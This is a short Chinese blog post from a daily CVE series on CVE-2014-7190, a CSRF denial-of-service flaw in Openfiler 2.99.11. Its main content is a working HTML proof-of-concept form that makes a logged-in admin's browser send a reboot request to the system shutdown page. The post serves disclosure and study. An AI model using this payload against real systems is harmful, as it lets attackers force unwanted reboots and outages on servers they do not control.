iT邦幫忙

DAY 22
0

天天CVE系列 第 22

Openfiler DoS via CSRF -- CVE-2014-7190

  • 分享至 

  • xImage
  •  

簡介

Openfiler 能夠被 CSRF 利用造成 DoS 攻擊。

Warning

  • Ver. 2.99.11

PoC

<div align="center">
<pre>
<h2><b>DoS<b></h2>

<form
action="https://www.example.com/admin/system_shutdown.html"
method="POST">
<input type="hidden" name="shutdowntype" value="reboot" />
<input type="hidden" name="delay" value="0" />
<input type="hidden" name="action" value="Shutdown" />
<input type="submit" name="submit" value="attack" />
</form>

</div>

結論

尚無 Patch 。

參考資料:http://www.securityfocus.com/bid/70163/info


上一篇
TestLink 多處 SQL Injection -- CVE-2014-5308
下一篇
Newtelligence dasBlog Open Redirect 漏洞 -- CVE-2014-7292
系列文
天天CVE30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言